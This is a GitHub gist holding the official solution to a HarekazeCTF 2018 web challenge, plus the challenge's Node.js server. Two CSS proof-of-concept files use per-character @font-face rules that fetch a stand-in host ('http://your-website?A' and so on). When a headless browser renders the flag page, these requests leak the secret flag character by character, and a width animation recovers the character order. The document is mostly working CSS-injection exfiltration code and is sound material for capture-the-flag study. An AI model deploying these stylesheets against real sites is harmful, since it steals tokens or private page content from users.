Skip to content

Instantly share code, notes, and snippets.

@KageShiron

KageShiron/poc1.css

Last active February 11, 2018 06:56
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save KageShiron/bb920ae6678d659de5b1949921942fca to your computer and use it in GitHub Desktop.
Save KageShiron/bb920ae6678d659de5b1949921942fca to your computer and use it in GitHub Desktop.
Download ZIP
HarekazeCTF 2018 Web250-A custom CSS for the flag (Official answer)
Raw
poc1.css
@font-face {
font-family: 'Capital-A';
src: url('http://your-website?A');
unicode-range: U+0041;
}
@font-face{
font-family:'Capital-B';
src:url('http://your-website?CB');
unicode-range:U+0042;
}
@font-face{
font-family:'Capital-C';
src:url('http://your-website?C');
unicode-range:U+0043;
}
@font-face{
font-family:'Capital-D';
src:url('http://your-website?D');
unicode-range:U+0044;
}
@font-face{
font-family:'Capital-E';
src:url('http://your-website?E');
unicode-range:U+0045;
}
@font-face{
font-family:'Capital-F';
src:url('http://your-website?F');
unicode-range:U+0046;
}
@font-face{
font-family:'Capital-G';
src:url('http://your-website?G');
unicode-range:U+0047;
}
@font-face{
font-family:'Capital-H';
src:url('http://your-website?H');
unicode-range:U+0048;
}
@font-face{
font-family:'Capital-I';
src:url('http://your-website?I');
unicode-range:U+0049;
}
@font-face{
font-family:'Capital-J';
src:url('http://your-website?J');
unicode-range:U+004A;
}
@font-face{
font-family:'Capital-K';
src:url('http://your-website?K');
unicode-range:U+004B;
}
@font-face{
font-family:'Capital-L';
src:url('http://your-website?L');
unicode-range:U+004C;
}
@font-face{
font-family:'Capital-M';
src:url('http://your-website?M');
unicode-range:U+004D;
}
@font-face{
font-family:'Capital-N';
src:url('http://your-website?N');
unicode-range:U+004E;
}
@font-face{
font-family:'Capital-O';
src:url('http://your-website?O');
unicode-range:U+004F;
}
@font-face{
font-family:'Capital-P';
src:url('http://your-website?P');
unicode-range:U+0050;
}
@font-face{
font-family:'Capital-Q';
src:url('http://your-website?Q');
unicode-range:U+0051;
}
@font-face{
font-family:'Capital-R';
src:url('http://your-website?R');
unicode-range:U+0052;
}
@font-face{
font-family:'Capital-S';
src:url('http://your-website?S');
unicode-range:U+0053;
}
@font-face{
font-family:'Capital-T';
src:url('http://your-website?T');
unicode-range:U+0054;
}
@font-face{
font-family:'Capital-U';
src:url('http://your-website?U');
unicode-range:U+0055;
}
@font-face{
font-family:'Capital-V';
src:url('http://your-website?V');
unicode-range:U+0056;
}
@font-face{
font-family:'Capital-W';
src:url('http://your-website?W');
unicode-range:U+0057;
}
@font-face{
font-family:'Capital-X';
src:url('http://your-website?X');
unicode-range:U+0058;
}
@font-face{
font-family:'Capital-Y';
src:url('http://your-website?Y');
unicode-range:U+0059;
}
@font-face{
font-family:'Capital-Z';
src:url('http://your-website?Z');
unicode-range:U+005A;
}
@font-face{
font-family:'Small-a';
src:url('http://your-website?a');
unicode-range:U+0061;
}
@font-face{
font-family:'Small-b';
src:url('http://your-website?b');
unicode-range:U+0062;
}
@font-face{
font-family:'Small-c';
src:url('http://your-website?c');
unicode-range:U+0063;
}
@font-face{
font-family:'Small-d';
src:url('http://your-website?d');
unicode-range:U+0064;
}
@font-face{
font-family:'Small-e';
src:url('http://your-website?e');
unicode-range:U+0065;
}
@font-face{
font-family:'Small-f';
src:url('http://your-website?f');
unicode-range:U+0066;
}
@font-face{
font-family:'Small-g';
src:url('http://your-website?g');
unicode-range:U+0067;
}
@font-face{
font-family:'Small-h';
src:url('http://your-website?h');
unicode-range:U+0068;
}
@font-face{
font-family:'Small-i';
src:url('http://your-website?i');
unicode-range:U+0069;
}
@font-face{
font-family:'Small-j';
src:url('http://your-website?j');
unicode-range:U+006A;
}
@font-face{
font-family:'Small-k';
src:url('http://your-website?k');
unicode-range:U+006B;
}
@font-face{
font-family:'Small-l';
src:url('http://your-website?l');
unicode-range:U+006C;
}
@font-face{
font-family:'Small-m';
src:url('http://your-website?m');
unicode-range:U+006D;
}
@font-face{
font-family:'Small-n';
src:url('http://your-website?n');
unicode-range:U+006E;
}
@font-face{
font-family:'Small-o';
src:url('http://your-website?o');
unicode-range:U+006F;
}
@font-face{
font-family:'Small-p';
src:url('http://your-website?p');
unicode-range:U+0070;
}
@font-face{
font-family:'Small-q';
src:url('http://your-website?q');
unicode-range:U+0071;
}
@font-face{
font-family:'Small-r';
src:url('http://your-website?r');
unicode-range:U+0072;
}
@font-face{
font-family:'Small-s';
src:url('http://your-website?s');
unicode-range:U+0073;
}
@font-face{
font-family:'Small-t';
src:url('http://your-website?t');
unicode-range:U+0074;
}
@font-face{
font-family:'Small-u';
src:url('http://your-website?u');
unicode-range:U+0075;
}
@font-face{
font-family:'Small-v';
src:url('http://your-website?v');
unicode-range:U+0076;
}
@font-face{
font-family:'Small-w';
src:url('http://your-website?w');
unicode-range:U+0077;
}
@font-face{
font-family:'Small-x';
src:url('http://your-website?x');
unicode-range:U+0078;
}
@font-face{
font-family:'Small-y';
src:url('http://your-website?y');
unicode-range:U+0079;
}
@font-face{
font-family:'Small-z';
src:url('http://your-website?z');
unicode-range:U+007A;
}
@font-face{
font-family:'under';
src:url('http://your-website?-');
unicode-range:U+005F;
}
@font-face{
font-family:'hyphen';
src:url('http://your-website?_');
unicode-range:U+002D;
}
#flag {
animation:fade 10s linear;
word-break: break-all;
}
#flag::first-line{
font-family: 'under','hypen','Capital-A', 'Capital-B', 'Capital-C', 'Capital-D', 'Capital-E', 'Capital-F', 'Capital-G', 'Capital-H', 'Capital-I', 'Capital-J', 'Capital-K', 'Capital-L', 'Capital-M', 'Capital-N', 'Capital-O', 'Capital-P', 'Capital-Q', 'Capital-R', 'Capital-S', 'Capital-T', 'Capital-U', 'Capital-V', 'Capital-W', 'Capital-X', 'Capital-Y', 'Capital-Z', 'Small-a', 'Small-b', 'Small-c', 'Small-d', 'Small-e', 'Small-f', 'Small-g', 'Small-h', 'Small-i', 'Small-j', 'Small-k', 'Small-l', 'Small-m', 'Small-n', 'Small-o', 'Small-p', 'Small-q', 'Small-r', 'Small-s', 'Small-t', 'Small-u', 'Small-v', 'Small-w', 'Small-x', 'Small-y', 'Small-z';
}
@keyframes fade {
0% {
width:10px;
}
100% {
width: 500px;
}
}
Raw
poc2.css
/* 前から後ろ */
@font-face {
font-family: 'Capital-A';
src: url('http://your-website?A');
unicode-range: U+0041;
}
@font-face{
font-family:'Capital-B';
src:url('http://your-website?B');
unicode-range:U+0042;
}
@font-face{
font-family:'Capital-C';
src:url('http://your-website?C');
unicode-range:U+0043;
}
@font-face{
font-family:'Capital-D';
src:url('http://your-website?D');
unicode-range:U+0044;
}
@font-face{
font-family:'Capital-E';
src:url('http://your-website?E');
unicode-range:U+0045;
}
@font-face{
font-family:'Capital-F';
src:url('http://your-website?F');
unicode-range:U+0046;
}
@font-face{
font-family:'Capital-G';
src:url('http://your-website?G');
unicode-range:U+0047;
}
@font-face{
font-family:'Capital-H';
src:url('http://your-website?H');
unicode-range:U+0048;
}
@font-face{
font-family:'Capital-I';
src:url('http://your-website?I');
unicode-range:U+0049;
}
@font-face{
font-family:'Capital-J';
src:url('http://your-website?J');
unicode-range:U+004A;
}
@font-face{
font-family:'Capital-K';
src:url('http://your-website?K');
unicode-range:U+004B;
}
@font-face{
font-family:'Capital-L';
src:url('http://your-website?L');
unicode-range:U+004C;
}
@font-face{
font-family:'Capital-M';
src:url('http://your-website?M');
unicode-range:U+004D;
}
@font-face{
font-family:'Capital-N';
src:url('http://your-website?N');
unicode-range:U+004E;
}
@font-face{
font-family:'Capital-O';
src:url('http://your-website?O');
unicode-range:U+004F;
}
@font-face{
font-family:'Capital-P';
src:url('http://your-website?P');
unicode-range:U+0050;
}
@font-face{
font-family:'Capital-Q';
src:url('http://your-website?Q');
unicode-range:U+0051;
}
@font-face{
font-family:'Capital-R';
src:url('http://your-website?R');
unicode-range:U+0052;
}
@font-face{
font-family:'Capital-S';
src:url('http://your-website?S');
unicode-range:U+0053;
}
@font-face{
font-family:'Capital-T';
src:url('http://your-website?T');
unicode-range:U+0054;
}
@font-face{
font-family:'Capital-U';
src:url('http://your-website?U');
unicode-range:U+0055;
}
@font-face{
font-family:'Capital-V';
src:url('http://your-website?V');
unicode-range:U+0056;
}
@font-face{
font-family:'Capital-W';
src:url('http://your-website?W');
unicode-range:U+0057;
}
@font-face{
font-family:'Capital-X';
src:url('http://your-website?X');
unicode-range:U+0058;
}
@font-face{
font-family:'Capital-Y';
src:url('http://your-website?Y');
unicode-range:U+0059;
}
@font-face{
font-family:'Capital-Z';
src:url('http://your-website?Z');
unicode-range:U+005A;
}
@font-face{
font-family:'Small-a';
src:url('http://your-website?a');
unicode-range:U+0061;
}
@font-face{
font-family:'Small-b';
src:url('http://your-website?b');
unicode-range:U+0062;
}
@font-face{
font-family:'Small-c';
src:url('http://your-website?c');
unicode-range:U+0063;
}
@font-face{
font-family:'Small-d';
src:url('http://your-website?d');
unicode-range:U+0064;
}
@font-face{
font-family:'Small-e';
src:url('http://your-website?e');
unicode-range:U+0065;
}
@font-face{
font-family:'Small-f';
src:url('http://your-website?f');
unicode-range:U+0066;
}
@font-face{
font-family:'Small-g';
src:url('http://your-website?g');
unicode-range:U+0067;
}
@font-face{
font-family:'Small-h';
src:url('http://your-website?h');
unicode-range:U+0068;
}
@font-face{
font-family:'Small-i';
src:url('http://your-website?i');
unicode-range:U+0069;
}
@font-face{
font-family:'Small-j';
src:url('http://your-website?j');
unicode-range:U+006A;
}
@font-face{
font-family:'Small-k';
src:url('http://your-website?k');
unicode-range:U+006B;
}
@font-face{
font-family:'Small-l';
src:url('http://your-website?l');
unicode-range:U+006C;
}
@font-face{
font-family:'Small-m';
src:url('http://your-website?m');
unicode-range:U+006D;
}
@font-face{
font-family:'Small-n';
src:url('http://your-website?n');
unicode-range:U+006E;
}
@font-face{
font-family:'Small-o';
src:url('http://your-website?o');
unicode-range:U+006F;
}
@font-face{
font-family:'Small-p';
src:url('http://your-website?p');
unicode-range:U+0070;
}
@font-face{
font-family:'Small-q';
src:url('http://your-website?q');
unicode-range:U+0071;
}
@font-face{
font-family:'Small-r';
src:url('http://your-website?r');
unicode-range:U+0072;
}
@font-face{
font-family:'Small-s';
src:url('http://your-website?s');
unicode-range:U+0073;
}
@font-face{
font-family:'Small-t';
src:url('http://your-website?t');
unicode-range:U+0074;
}
@font-face{
font-family:'Small-u';
src:url('http://your-website?u');
unicode-range:U+0075;
}
@font-face{
font-family:'Small-v';
src:url('http://your-website?v');
unicode-range:U+0076;
}
@font-face{
font-family:'Small-w';
src:url('http://your-website?w');
unicode-range:U+0077;
}
@font-face{
font-family:'Small-x';
src:url('http://your-website?x');
unicode-range:U+0078;
}
@font-face{
font-family:'Small-y';
src:url('http://your-website?y');
unicode-range:U+0079;
}
@font-face{
font-family:'Small-z';
src:url('http://your-website?z');
unicode-range:U+007A;
}
@font-face{
font-family:'under';
src:url('http://your-website?-');
unicode-range:U+005F;
}
@font-face{
font-family:'hyphen';
src:url('http://your-website?_');
unicode-range:U+002D;
}
#flag {
animation:fade 10s linear;
word-break: break-all;
font-family: 'under','hypen','Capital-A', 'Capital-B', 'Capital-C', 'Capital-D', 'Capital-E', 'Capital-F', 'Capital-G', 'Capital-H', 'Capital-I', 'Capital-J', 'Capital-K', 'Capital-L', 'Capital-M', 'Capital-N', 'Capital-O', 'Capital-P', 'Capital-Q', 'Capital-R', 'Capital-S', 'Capital-T', 'Capital-U', 'Capital-V', 'Capital-W', 'Capital-X', 'Capital-Y', 'Capital-Z', 'Small-a', 'Small-b', 'Small-c', 'Small-d', 'Small-e', 'Small-f', 'Small-g', 'Small-h', 'Small-i', 'Small-j', 'Small-k', 'Small-l', 'Small-m', 'Small-n', 'Small-o', 'Small-p', 'Small-q', 'Small-r', 'Small-s', 'Small-t', 'Small-u', 'Small-v', 'Small-w', 'Small-x', 'Small-y', 'Small-z';
}
#flag::first-line{
font-family:none;
}
@keyframes fade {
0% {
width:500px;
}
100% {
width: 10px;
}
}
Raw
server.js
'use strict';
const express = require("express");
const bodyParser = require('body-parser');
const puppeteer = require('puppeteer');
const https = require('https');
const fs = require("fs");
const app = express();
const request = require("request");
app.use(bodyParser.urlencoded({ extended: true }))
app.use(bodyParser.json())
async function crawl(req, res) {
if(!req.body['g-recaptcha-response']) {
res.send("ReCAPTCHA error.");
return;
}
var verificationUrl = `https://www.google.com/recaptcha/api/siteverify?secret=${process.env.RECAPTCHA_SECRET}&response=${req.body['g-recaptcha-response']}&remoteip=${req.connection.remoteAddress}`
request(verificationUrl,async function(error,response,body) {
const recaptcha = JSON.parse(body);
if( recaptcha.success === true ) {
res.send("Crawling");
const browser = await puppeteer.launch({executablePath: '/usr/bin/chromium'});
const page = await browser.newPage();
await page.goto( "http://127.0.0.1:3002/flag.html?css=" + req.body.css, { waitUntil: "load" });
await page.waitFor(20000);
await browser.close();
}else{
res.send("ReCAPTCHA error.");
}
});
};
app.get('/server.js',function (req, res) { res.sendFile("/app/server.js") });
app.post('/crawl.html', crawl);
app.use('/', express.static('public'));
var server = app.listen(3001, function () {
var host = server.address().address;
var port = server.address().port;
console.log('CSS-Injection http://%s:%s', host, port);
});
const app2 = express();
app2.get('/flag.html', function (req, res) {
console.log(req.connection.remoteAddress);
req.query.css = req.query.css || "";
if (req.query.css.startsWith("http://") || req.query.css.startsWith("https://")) {
res.send(`<html>
<link rel="stylesheet" href="${encodeURI(req.query.css)}" />
<body>
<div id="flag">
HarekazeCTF{${fs.readFileSync("flag.txt")}}
</div>
</body>
</html>`);
} else {
res.send("Bad URI");
}
});
var server2 = app2.listen(3002,"localhost");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment